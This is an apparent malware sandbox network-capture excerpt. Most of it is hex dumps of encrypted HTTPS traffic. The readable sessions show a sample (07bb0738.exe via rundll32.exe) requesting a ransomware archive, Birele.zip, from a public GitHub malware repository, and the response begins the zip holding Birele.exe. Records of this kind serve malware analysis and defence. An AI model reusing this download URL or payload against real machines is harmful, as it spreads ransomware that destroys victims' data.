                                                                                                                                                    2022-09-29 13:01:29 UTC39060INData Raw: a1 20 33 b9 bc 0f 2d 4e e4 00 ff 62 35 f6 95 ca cd 09 9f 09 89 a6 52 2d e9 b4 39 1a ca fa f3 cb 0e fd 04 46 f2 e0 25 20 49 bb 66 e4 bd 4a c1 76 bb a5 05 1e e4 d3 02 09 b2 5d f8 86 48 d2 8d 6f e4 62 e9 31 8b ce 64 18 5c dd 0c e0 56 9b a1 44 29 4e 19 4c 8a 3e f2 77 0f e8 ed bd 61 7c ac 55 6e 1a a8 72 90 08 67 f5 96 57 55 bd d9 16 71 e2 bf f5 b9 70 80 9d 01 11 bb 8f f3 35 fa 3d b4 3a 03 7f 03 de 61 5c 3e 35 ce c3 c7 83 c7 b4 9d 09 48 49 55 2e 3b af 9a c0 35 7e b2 00 d6 d7 93 e9 7a 93 e6 2f c3 e4 5f 8f 7c 2d 61 90 54 ed 67 e8 8d d0 a5 28 ab b7 09 39 90 b1 cc 90 d7 d6 ae 5f b8 f4 71 4a fd b3 c6 86 6b f7 c7 29 3f cb f1 c5 e7 f4 a9 79 f4 f6 5d 76 a0 82 ef 0a 9a 89 37 d1 25 ac 05 03 d0 ba 88 f3 ae de 7c d5 5c 7f e6 2d c0 a1 c3 93 12 b7 3d 82 bc c4 86 41 3c fc 60
                                                                                                                                                    Data Ascii: 3-Nb5R-9F% IfJv]Hob1d\VD)NL>wa|UnrgWUqp5=:a\>5HIU.;5~z/_|-aTg(9_qJk)?y]v7%|\-=A<`
                                                                                                                                                    2022-09-29 13:01:29 UTC39076INData Raw: b7 ba 56 66 0c bc e3 9e 76 70 03 46 37 25 20 fb ea bf 06 bf f6 ae 71 db d3 d0 a3 52 4a d3 23 c9 b8 98 9a b9 da 3c 4b 10 c3 d4 f4 dd 7d 53 37 a0 0d cf 67 d9 97 19 6d 33 c6 6e 65 a1 a5 c3 0e bd c2 fe ab 79 ae 90 06 8e 80 90 45 41 87 0a 7c 18 88 96 92 8b 9e 70 5d 8f 0e fd f3 2f b0 14 69 ec 72 f6 dc fa f0 18 68 59 ce 81 fd d6 ed 16 ba f5 4f e5 bf bf 9f 6e 81 89 12 83 97 ac a3 12 d8 52 3c 9b 41 b8 3c f9 39 3c df 8a 81 30 fd ff 81 d1 68 2b b2 8e d4 16 6e 6e ee 3f 9a 53 3a ae a9 08 ef 41 10 ab 64 8b 81 1c 2f 2d 13 7e ad 74 6f 1f 6e e1 bb 72 d6 13 bb a1 72 a3 52 51 e5 b7 89 ac 7c c4 98 1e 97 c1 23 4e 51 b8 fe 3c 0e d9 6c d1 8c 31 26 c4 0b e3 8e 76 4a 04 f3 ff 70 b8 87 00 30 5d 17 49 84 e2 02 59 eb 05 16 23 5a 56 ab 58 89 5b 6a a4 7c c3 21 1e a2 0a d4 b6 98 db f4
                                                                                                                                                    Data Ascii: VfvpF7% qRJ#<K}S7gm3neyEA|p]/irhYOnR<A<9<0h+nn?S:Ad/-~tonrrRQ|#NQ<l1&vJp0]IY#ZVX[j|!
                                                                                                                                                    2022-09-29 13:01:29 UTC39092INData Raw: 82 07 ac ab 49 58 1f b3 d4 0e ab c0 f2 fb a5 38 3d f9 52 5f f4 0e 6d 64 0a 5f 5f a4 e5 a0 c8 d8 92 f8 59 71 5d 11 27 ef f1 23 2d cf 16 5c 0d e4 cc 86 ec 72 da 98 5e 3b 73 56 23 79 60 65 6c f7 6f 4a 92 d7 0c 60 cf 05 ec 4e 83 cc e1 7a 29 9d d8 be de 46 37 4a 6d 51 0a c9 fb 10 81 cf e9 fb fd a8 7b c5 71 ea 50 6e 9e 29 2d 15 09 b9 01 55 a6 88 04 a4 0a be 56 21 59 c7 29 2c 97 7d 7e 68 2e 45 bf ad 41 cd 30 95 f3 27 7f 33 2e 98 4f 0c ec 0c b0 d8 07 ee f7 16 73 f7 7b 94 4d 89 73 d2 25 b3 3a 2c 5c 15 b7 40 55 71 e1 59 39 d4 5f af 8f 0d 74 21 d6 60 b9 61 a4 45 e3 a3 db ed 95 33 b1 b8 a8 08 f2 3a 9d 09 89 29 97 72 00 d9 35 ff 87 d2 b8 e8 d2 20 3e a2 b8 67 d4 3d 0b 1c 91 e7 ab f9 9a 78 aa bf 22 35 15 84 83 98 3d 48 4a 3d da c5 14 c1 4b e3 08 b9 cf f6 6d 08 32 ec 3b
                                                                                                                                                    Data Ascii: IX8=R_md__Yq]'#-\r^;sV#y`eloJ`Nz)F7JmQ{qPn)-UV!Y),}~h.EA0'3.Os{Ms%:,\@UqY9_t!`aE3:)r5 >g=x"5=HJ=Km2;
                                                                                                                                                    2022-09-29 13:01:29 UTC39108INData Raw: 4a b7 fa ea 21 46 9a 5a 48 f2 61 97 a8 f0 ed aa 5a 35 6a 3f 65 29 f4 87 9a 1e dd 3b 89 de 41 f4 19 2c be 62 e5 f1 05 0c b0 c1 aa 18 46 6e d2 42 0e 4f e2 1d 3d 90 c5 da 3c 02 4f 44 ed 25 e4 81 98 59 52 bc 40 4e 11 79 33 f5 0b 74 db cd a5 9a 21 65 01 b1 51 b2 76 47 b9 be bc 8d 4f fd 4c 48 6a d4 0b 13 21 90 5c 5d 80 eb af fc d7 11 7e 21 22 39 46 fd f6 27 fc cc e8 26 53 74 0c 72 38 fb 5d b5 ce 9c 4c 75 60 f6 84 17 23 d7 bd fa ad 9d 16 62 9b ce 07 b9 04 79 56 67 d2 8b 79 38 b5 9c 74 5b 5e 43 64 62 2a cf 30 30 05 6f e7 9d 2b 4b 4e ac 01 52 63 74 0d 41 8c 79 12 79 6b 36 a7 55 a3 22 e9 6f f8 8e 8d 0b 73 83 10 5e b4 6c fe b1 b3 b8 ab 0f 84 fa a3 67 d9 ca 8d c2 e9 b0 67 a4 46 51 1e 40 d4 0e ba 2e 96 ac 57 b6 11 b7 fc 9b 6b 5e 89 c3 d5 97 f2 f2 bc b6 1e 2b e6 aa 50
                                                                                                                                                    Data Ascii: J!FZHaZ5j?e);A,bFnBO=<OD%YR@Ny3t!eQvGOLHj!\]~!"9F'&Str8]Lu`#byVgy8t[^Cdb*00o+KNRctAyyk6U"os^lggFQ@.Wk^+P
                                                                                                                                                    2022-09-29 13:01:29 UTC39124INData Raw: a5 3d 82 9f 32 24 34 5c d1 a6 e8 6b e5 29 ed 9d 0a 0a e0 da 92 4b e7 d7 d7 5d 09 11 8d 70 3a a4 fb 79 2a 33 ac b9 ec 3b 96 60 2f 22 e4 4b 4b ad 09 ea c6 3e 7e 8b 7a 36 4c d5 36 19 75 ad 6e 7f 11 ac 70 47 2e b8 ed 67 61 bc 27 db e2 60 dd 6b 39 9f f4 40 e7 e3 ab d4 d9 87 cd c6 35 1f 0f f9 df cc 98 f3 4b 81 99 8e b2 d1 21 15 eb 75 2a ec 61 65 2d 48 e8 98 10 2d dd 97 aa 5a 6f 0f fe 2b 49 57 bb 73 22 75 3f cb 50 f3 4c 06 d2 36 bd 5b ba 9c 64 c2 29 b5 c1 ef 55 9e fd c8 d1 9b 86 e8 01 32 94 d0 1e 66 f1 46 de 2b bb c7 5a 04 c1 da 8b 04 7a 51 62 3f 51 78 a8 30 af 61 9b 03 76 b6 0e 48 f6 44 ae 90 6f 47 a0 13 0b 24 c8 fd 3f f9 95 4c 4b 0d 2f d9 66 14 a0 f7 c1 06 6d a1 d8 1b 83 f9 7b 6b ea 01 9e 6d 47 90 41 f6 5a 45 a6 1b 52 09 89 7b 86 5e cd 61 15 6f ca 8d b8 96 c8
                                                                                                                                                    Data Ascii: =2$4\k)K]p:y*3;`/"KK>~z6L6unpG.ga'`k9@5K!u*ae-H-Zo+IWs"u?PL6[d)U2fF+ZzQb?Qx0avHDoG$?LK/fm{kmGAZER{^ao
                                                                                                                                                    2022-09-29 13:01:29 UTC39140INData Raw: 92 8b 0c b3 1b 22 92 6f 65 81 de 60 43 67 70 38 ae 18 5c df fc 68 6a d6 d4 a1 85 ef 1a b8 ef 8b 35 bb c5 49 ca 46 88 8a 43 1d 20 a1 eb 41 a2 89 ff 37 bc 8b ee d2 84 6c 51 7e c4 fb 96 e2 85 03 a3 a1 23 f0 b3 c2 69 02 0d c9 c2 62 5f 00 fe 0d 57 49 f6 f3 a2 af c0 43 b6 7a 90 aa cd 29 50 20 b1 f8 5a 86 28 6d ee 66 33 6e b6 29 32 28 7c 0a b5 1f 0a 88 44 05 2f c1 41 55 53 e8 e8 fd 33 0a 08 49 e5 88 f5 cd c4 9d be 28 20 81 8a 19 db ee 31 95 5a 92 f1 6d f8 4c 53 48 ba ed eb 99 73 7a 56 2a f7 6f 86 db 7f 90 f8 24 81 52 08 ed d3 43 9a 53 a5 06 a3 4f 01 1c 71 d2 33 d0 a5 84 d7 59 22 4d e7 a3 62 d5 13 dc 0c 1d e4 37 e7 9d 5f 32 40 05 f9 39 90 37 65 18 da ce ab eb be 8e 21 06 a3 41 af 27 97 68 30 da 3a 0d 26 8e 2a cb 4a 51 b5 6d f7 7f 74 9c 19 1c 17 04 41 46 b4 56 83
                                                                                                                                                    Data Ascii: "oe`Cgp8\hj5IFC A7lQ~#ib_WICz)P Z(mf3n)2(|D/AUS3I( 1ZmLSHszV*o$RCSOq3Y"Mb7_2@97e!A'h0:&*JQmtAFV
                                                                                                                                                    2022-09-29 13:01:29 UTC39150INData Raw: b6 99 00 1e 44 bc 72 e4 68 c1 8e cb 5c 99 bc c6 e8 19 6c ee 00 4a 7c d0 9c da c6 a1 c2 c1 d8 94 81 24 49 c5 03 59 64 11 b9 12 a6 88 e1 42 6e dc 85 9d 1f 96 90 35 9a b8 cd bd 88 c5 23 2f b7 7e 37 21 a8 c3 ff 7c 3a 7a 29 0c e7 0b 07 55 21 cf 8c 28 55 c4 6e 9a 14 fe fd 3d fc 78 bc 99 13 15 f9 55 99 a0 4c d0 97 39 12 50 4d 1d 63 fb a8 88 87 06 41 af eb a8 aa 2f 89 c2 3d d7 61 7c 52 6a a5 ec ca 25 c3 46 a3 84 01 5f 70 9f e0 8a 82 63 29 4f 53 27 b3 8d c9 2c af 27 6d e3 a9 a8 ac f4 b5 28 20 13 0f 3a 91 0c 29 88 58 66 f7 d4 e7 ad c6 9b f2 07 84 31 1d 56 0b 5a f8 7a ab c5 33 52 dc 71 93 90 94 60 2f 6c df 67 f8 fc 60 c4 b8 a6 dd 10 a2 e7 fd 6a 73 e1 a3 6c e2 b2 82 e2 e0 fb 96 af 46 21 97 96 cc 48 9a 47 19 85 02 69 07 44 93 ce e1 1b fa af 2e 95 ad db 60 a0 a4 6f f0
                                                                                                                                                    Data Ascii: Drh\lJ|$IYdBn5#/~7!|:z)U!(Un=xUL9PMcA/=a|Rj%F_pc)OS','m( :)Xf1VZz3Rq`/lg`jslF!HGiD.`o
                                                                                                                                                    2022-09-29 13:01:29 UTC39166INData Raw: 39 89 53 e4 fb 8e 75 c7 1d 43 23 52 ea d9 12 c0 94 04 72 ab ef f8 ad ef 47 9c a6 dd 7b c8 2d d1 3c a2 f2 e3 5f 8d c1 a5 d9 76 63 e1 aa ed 59 45 86 27 86 90 76 1b 49 fe e8 f3 b5 84 3e 86 fb 24 48 78 59 10 6d ed d5 32 ff 1a 6a 55 01 34 69 dd 6c 3f 26 c9 fa 9b d8 05 28 1c ff 96 25 c7 c0 22 9b ba e9 70 ff 04 2f 6c 06 a0 7b ea ee bc 62 47 0a be 40 e3 e9 21 18 d6 c5 fa 3c 5e 34 ee d6 76 70 71 6c d2 a7 20 b8 c7 dc 81 96 ed 51 04 65 37 89 56 90 89 c1 92 30 f9 c3 4e e6 28 a9 38 aa 4e e6 c7 b7 5b d9 f5 ca 03 b9 d2 e2 a8 8e bd f0 0b e0 ea c5 ed a4 e3 11 ce b6 bf 28 e9 6e 7e 39 36 a3 e4 c4 65 b2 b9 5c 01 bf 3f 00 08 88 3f 88 d0 ff 57 fa 94 79 40 97 46 c2 16 18 ab a7 2d 12 ab f2 01 6c b7 d4 5b 6f e2 ba fe ff 9c a7 ff be d2 a3 52 78 2a 2d 55 63 a3 3c d3 ad f9 1d be 54
                                                                                                                                                    Data Ascii: 9SuC#RrG{-<_vcYE'vI>$HxYm2jU4il?&(%"p/l{bG@!<^4vpql Qe7V0N(8N[(n~96e\??Wy@F-l[oRx*-Uc<T
                                                                                                                                                    2022-09-29 13:01:29 UTC39182INData Raw: 42 16 68 7b c0 b1 db 7d e7 10 24 5a e5 c2 85 f2 90 ac c7 40 dc 90 3c ae ad 73 24 6f 9d ac 86 d5 44 f9 cf 14 a0 a4 49 98 15 0c e2 8c f0 a3 21 d6 d1 0f c9 e1 e1 b6 a9 4f 1c 3f fb b8 70 6e b6 e1 03 0a 62 d8 be 7c ff b5 fc 51 84 d6 b1 6c 0e de c0 77 df d7 34 69 fc c9 a4 6d db af ec 1b 92 42 b2 62 3d 49 f5 65 aa cd ae 21 69 74 d6 f3 a7 b4 e0 8f 2d ac 69 1c 20 26 0b f8 8a 4f 48 3b 85 f4 11 4b 42 ed 6e a5 d2 e2 4e c9 5d 10 53 29 4b 92 e0 be fa c0 fc ef 2d de ae 41 b3 bc 8c 43 c5 0d 5d 07 3a a6 1d 8d 6c 9b 29 f1 9a 5d 2b 4e b3 96 da e7 ed 84 16 4d a2 7f 8e 5d bf a3 e0 43 49 24 7b 02 db bb d6 93 96 cd 27 78 b3 6b 72 38 0a 3a fb 53 74 ca 29 59 bc fb 46 b9 86 d0 e9 95 9b 63 47 1e c6 c6 49 e7 30 bf c0 df e3 83 bc ae 6b df ac 19 9c f2 52 c0 5f 9a 66 1d 39 41 11 58 aa
                                                                                                                                                    Data Ascii: Bh{}$Z@<s$oDI!O?pnb|Qlw4imBb=Ie!it-i &OH;KBnN]S)K-AC]:l)]+NM]CI${'xkr8:St)YFcGI0kR_f9AX
                                                                                                                                                    2022-09-29 13:01:29 UTC39198INData Raw: 72 ee ba fd cc 9c bd c3 4e 55 a7 63 d0 86 9d 8b 99 68 6b 69 f4 24 74 d2 30 8f 2b 58 03 cf f6 65 f7 49 ae 4d 71 a6 1b b9 40 50 a0 70 05 f6 93 2d f9 05 5b 26 c0 87 e6 d0 83 99 8b ac dc ef 50 cc bf 3e fb 0f ce 6e 75 12 da b9 bf 71 63 69 fc 8d 90 48 34 ca a1 08 ee 6c 4b 52 34 18 70 45 25 14 17 65 ff c8 41 d8 2e c7 d4 80 94 b3 f6 7f cb a9 e6 f7 a8 a9 0c df 50 a3 4e 2c 85 c5 05 ea f0 95 29 95 a1 0d ad df c9 1e 26 fe 1d 3e e0 eb ae 77 8d 7e b6 41 5f 12 c3 ab 4c 9e 49 8e b7 fd 39 3c 0b 41 cb 66 d0 fd 5f 99 f8 ae b4 1a f7 b0 7f d8 a2 c3 99 d0 59 e6 42 52 b3 f3 53 fd 1c 1f f3 05 a7 b1 5f 0a e3 f0 92 28 a6 9f 96 30 4b 85 b8 71 24 03 28 f8 e2 fb c5 1a 1f ca 40 34 32 7f c8 f8 34 93 d6 61 c1 8c 8b d2 c6 93 50 dd 1a 44 b5 34 79 db 97 bd c2 85 3d 0a d3 2a 67 bf f4 32 93
                                                                                                                                                    Data Ascii: rNUchki$t0+XeIMq@Pp-[&P>nuqciH4lKR4pE%eA.PN,)&>w~A_LI9<Af_YBRS_(0Kq$(@424aPD4y=*g2
                                                                                                                                                    2022-09-29 13:01:29 UTC39214INData Raw: a7 bc 1b e7 4d 1a 9e c4 1a 3b b3 01 80 d3 e6 8d 37 53 68 3a 36 2f f9 ac f1 be ba cd e3 15 04 81 fb bf 53 e8 48 79 ac a6 fd 96 94 9b 90 5a dd 97 02 67 cf 2c 31 9c 6d 58 69 a4 b0 6a fc df 2a 53 2a 46 70 53 fa e3 b1 bb 1a f4 b0 1c b9 ce fb 6b 4e 23 19 b6 57 9e b9 1c bb dc 4b 13 6f ea 94 99 1d ed ed 05 4c 20 4d ad f7 2c 46 ce b8 af cc 78 27 07 e6 f6 b7 0d a4 cc 1a 60 99 c9 33 38 16 d3 7b bd 4b ed d2 9f 85 c1 2e c8 e1 33 2d 7b 56 b4 a8 dc 0d 0a a2 3d 13 9c 5c 90 d6 17 01 fd 5d 96 46 dd f8 4e 03 a9 7d 15 84 e4 f7 b2 4f 34 49 e2 3d 4b 31 85 14 a5 b1 8f da e8 c5 1d 81 ec 04 09 2f 81 21 ce 54 0e c7 40 36 ab 90 89 94 e1 bf f2 fc a6 89 10 60 40 ee db 31 2b 41 c8 ff da 5e ad a6 b1 45 b4 ed fe 89 b4 02 ca 63 c5 46 bf 19 b9 e7 1c e9 83 78 ee fd 7f 9d 1a 2e df a1 81 f5
                                                                                                                                                    Data Ascii: M;7Sh:6/SHyZg,1mXij*S*FpSkN#WKoL M,Fx'`38{K.3-{V=\]FN}O4I=K1/!T@6`@1+A^EcFx.
                                                                                                                                                    2022-09-29 13:01:29 UTC39230INData Raw: 8b 6d 9b f4 38 89 f4 56 77 6b f2 bc 49 f3 b8 e8 ba 99 7d 9a ed d2 28 38 09 a5 94 9f 6b da e4 66 b4 ff 2e 44 d5 f8 c9 fd ea 54 5a 97 95 47 60 4c 8c 28 37 d6 08 9a 25 93 d8 3b b0 5c 25 e2 1f 91 cc 89 11 34 07 04 4b 63 80 91 eb eb 9a d6 b2 64 6f 51 ff 0f 6e 69 ab 2a fa 8c 47 4d 15 95 43 7e 29 4c c3 72 8e 65 69 43 01 9a 20 69 d8 ce fd 19 31 b6 e6 40 3b 43 be 95 82 cf 54 8b 60 fb 37 7d f3 cc ac 2d ba 4b 27 b5 95 32 cf 04 6b 4e c9 f9 df 27 2e e5 48 ac 79 c6 bf ea 45 1b 88 1c a0 77 de 4a 14 dd df d8 fa 2b c5 c8 8d 04 56 eb d1 f3 e4 53 72 9e 6d 7e b2 ad b1 d9 32 5f 46 6b a6 fa ea 8a 6f ab 71 9f 71 34 c6 41 ef 76 a0 d2 8b 39 65 c3 4a 6a 98 a1 99 9a 69 13 50 67 92 a0 1a 3c 29 dc d7 a2 cc 7c 96 28 0c a1 fd 72 96 8b bf a8 d9 bb ab 09 90 c8 8e ed 45 62 fb 23 e4 7d 82
                                                                                                                                                    Data Ascii: m8VwkI}(8kf.DTZG`L(7%;\%4KcdoQni*GMC~)LreiC i1@;CT`7}-K'2kN'.HyEwJ+VSrm~2_Fkoqq4Av9eJjiPg<)|(rEb#}
                                                                                                                                                    2022-09-29 13:01:29 UTC39246INData Raw: d2 e9 66 6b 1b d4 0e f7 a6 f7 97 f2 66 41 3d 26 29 bc 5b 32 82 78 b3 b1 7e ef a5 2b 1b 04 51 1b 6b 1b 41 ec 19 66 b3 48 08 37 ae c6 9f ab 95 8b f7 53 3f 2a 30 66 a8 b8 55 94 bc c0 5b 53 54 da 48 87 0a dd 6a fd de f4 ff ec 44 6d ec 03 5e 9a e5 cf c6 99 4e a0 a2 25 f8 f7 ac bd 27 07 1a 6c 7c 52 64 f2 8b a6 95 81 63 62 45 76 79 64 ed 58 ed 94 51 51 7a 7d d5 d1 85 16 ed bf 2e 12 92 2d 4d 39 61 60 52 ec 57 92 80 a2 2c 94 dc 12 71 ce 72 cd c2 3c 72 01 9b ee 01 57 ae 9a 52 55 c3 8b 4f 38 25 06 36 8c c6 7d eb 9e e7 13 88 99 4e d2 4b 4c 16 20 b9 e2 20 28 d2 e7 e2 c9 e5 4f 70 b7 83 c5 0e 7a e4 68 74 a1 c0 99 66 a6 87 ea 64 c1 c9 23 ef 44 6a 5d 18 de 3d 08 f2 b3 b5 1a 17 b7 22 60 f8 ed f9 e6 c1 27 ae 5f c2 78 ca 55 78 1d 6c 06 cf 32 55 ea 8c 73 65 84 40 75 c6 48 61
                                                                                                                                                    Data Ascii: fkfA=&)[2x~+QkAfH7S?*0fU[STHjDm^N%'l|RdcbEvydXQQz}.-M9a`RW,qr<rWRUO8%6}NKL (Opzhtfd#Dj]="`'_xUxl2Use@uHa
                                                                                                                                                    2022-09-29 13:01:29 UTC39262INData Raw: 25 f1 23 15 4a fb df 8c 18 8f 2f 39 7e f9 66 53 a2 e5 ed 16 1a b8 be d7 60 d7 81 35 91 15 9d 63 60 0c 7a 42 ac ce a1 e7 a9 12 54 13 69 54 45 38 ad 30 71 79 6c 20 74 44 2a c0 33 37 ff 7c 2b 17 4f 0a 61 56 f1 4a b6 c2 77 67 56 94 13 a4 78 1a 29 51 47 9f fb 62 0a d3 05 5f 68 14 cb c5 56 72 a0 6c dd 42 fb 9f fc d9 91 98 84 21 4d db 85 4d 99 a8 26 48 42 52 61 30 91 56 6e bb 50 4f a9 4f 9b c9 cd 2f 4f 6d bc 72 26 fd 03 e6 f0 25 a4 c2 6b 75 4d b2 90 fe ba c6 e0 53 da 58 f6 dd 9a 8c ff 8b 6a 12 df de 07 15 ee f5 cd e1 34 52 db fb 41 ec ee 01 07 6d 7f f3 a8 5a f6 c5 b7 18 10 60 69 66 43 fb 97 19 2a 7d 57 da 0e a3 17 8c e5 c0 f5 14 d7 a9 8a 02 52 88 25 bc ef 8e ba de 6d 81 2f 90 31 99 77 3f de 39 ba 7a b5 fa d2 68 84 70 66 e4 b5 f7 6c ac b0 9c 58 20 c2 0c 44 18 63
                                                                                                                                                    Data Ascii: %#J/9~fS`5c`zBTiTE80qyl tD*37|+OaVJwgVx)QGb_hVrlB!MM&HBRa0VnPOO/Omr&%kuMSXj4RAmZ`ifC*}WR%m/1w?9zhpflX Dc
                                                                                                                                                    2022-09-29 13:01:29 UTC39278INData Raw: be 87 49 ef b4 ac 86 6d 69 50 97 71 49 d1 bb 8b 12 7e 16 3d 3b 51 c7 6a 1b ab 2f 36 bb 74 2f 76 3b b2 74 c1 3b af 1e e9 da 1f ca f4 c9 0a ae 46 1d 48 dc f7 89 6e fe 47 e1 dd 6d 8c bf cb 33 92 90 cd 24 e6 8c b8 99 43 f3 62 07 27 21 c4 b6 72 ca a2 a3 1a 7c 91 46 b6 23 94 3d 1e 48 57 87 bb 89 67 48 3d 1e 0a ce 2e 38 48 00 62 e9 3c 98 f9 dc 04 04 dd 54 9c 7c a1 9b 63 8f 17 bf 31 15 9d 34 41 5e 2d 2b bb 02 93 18 05 63 13 e4 c7 61 62 31 7e ea 08 46 ba 6a 74 e2 1c a0 7a 2d 4d ea d9 28 fa 72 09 a2 ec df d3 e6 5e 52 33 da e6 c9 69 52 31 93 2a 37 0f a9 5e 62 a3 3b 95 8a 13 e7 20 bd ef c6 04 fb 83 d0 f4 43 b2 44 5d 81 5d b7 78 c5 67 25 b1 9d 62 3b ce ab 37 aa 92 a3 41 f6 10 5e 17 bf 43 de 59 98 6d 7c d1 a3 32 12 25 6e 1d 70 eb 88 3b 05 d7 ad e7 d5 88 ab 4d 6d ae 31
                                                                                                                                                    Data Ascii: ImiPqI~=;Qj/6t/v;t;FHnGm3$Cb'!r|F#=HWgH=.8Hb<T|c14A^-+cab1~Fjtz-M(r^R3iR1*7^b; CD]]xg%b;7A^CYm|2%np;Mm1


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    165192.168.2.349899140.82.121.3443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 13:01:29 UTC39293OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/Birele.zip HTTP/1.1
                                                                                                                                                    Host: github.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    166140.82.121.3443192.168.2.349899C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 13:01:29 UTC39294INHTTP/1.1 302 Found
                                                                                                                                                    Server: GitHub.com
                                                                                                                                                    Date: Thu, 29 Sep 2022 13:00:59 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                    Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                    Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Birele.zip
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                    Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                    2022-09-29 13:01:29 UTC39294INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    167192.168.2.349900185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 13:01:30 UTC39296OUTGET /Endermanch/MalwareDatabase/master/ransomwares/Birele.zip HTTP/1.1
                                                                                                                                                    Host: raw.githubusercontent.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    168185.199.108.133443192.168.2.349900C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 13:01:30 UTC39296INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 116134
                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                    Content-Type: application/zip
                                                                                                                                                    ETag: "591eaf40b2c1654824c7b57ace22a858e557d50f2bd61e6d218bc09b4c052c63"
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    X-GitHub-Request-Id: 33D4:39B3:7C75A4:8A0A06:6335930F
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Date: Thu, 29 Sep 2022 13:01:30 GMT
                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                    X-Served-By: cache-mxp6928-MXP
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    X-Cache-Hits: 1
                                                                                                                                                    X-Timer: S1664456490.084669,VS0,VE1
                                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Fastly-Request-ID: d0c202567cbb629ca0071345228c7cd4dc4807cd
                                                                                                                                                    Expires: Thu, 29 Sep 2022 13:06:30 GMT
                                                                                                                                                    Source-Age: 30
                                                                                                                                                    2022-09-29 13:01:30 UTC39297INData Raw: 50 4b 03 04 14 00 01 00 08 00 0f b9 98 3f 08 02 e3 81 f6 c4 01 00 00 d2 01 00 15 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 42 69 72 65 6c 65 2e 65 78 65 78 87 52 7a 1b 81 59 80 6e db ec 5d ee 26 6d 7c 09 66 bf 9b 5b ca c3 1f 74 30 22 7f 86 ac 21 7f ce 7d ef 5b c1 ea 5b 7a d1 dd b0 eb 9b 49 ce 14 14 68 6b 08 48 f5 ec a4 42 03 54 02 12 f6 9d 93 01 c2 cb 0f e2 c9 32 64 50 3b 29 65 4b c7 74 fb 81 69 1a 6f ea cc bb e0 e3 53 1a 43 74 5f 3b 59 df ff a6 59 84 cb 71 1b d4 44 3c e2 d1 f6 be 7b b7 a0 62 95 ae e0 1f d7 0b 6b 49 83 79 23 5c 2d cd 1a 45 47 6d c5 92 5f c5 70 88 d9 7e 4d 94 8b d3 5c a7 b8 c3 66 c3 60 fb 0e 89 2c e7 e4 b3 65 32 70 be fd 5f 58 7b 5e ca c4 22 8d 5e 0f d8 7e 6d 13 c2 f0 ff c8 0a 43 f1 0e ab 32 bd 72 24 c3 10 03 39 3e 75 13 eb 26 26 11 a6 bf
                                                                                                                                                    Data Ascii: PK?Endermanch@Birele.exexRzYn]&m|f[t0"!}[[zIhkHBT2dP;)eKtioSCt_;YYqD<{bkIy#\-EGm_p~M\f`,e2p_X{^"^~mC2r$9>u&&
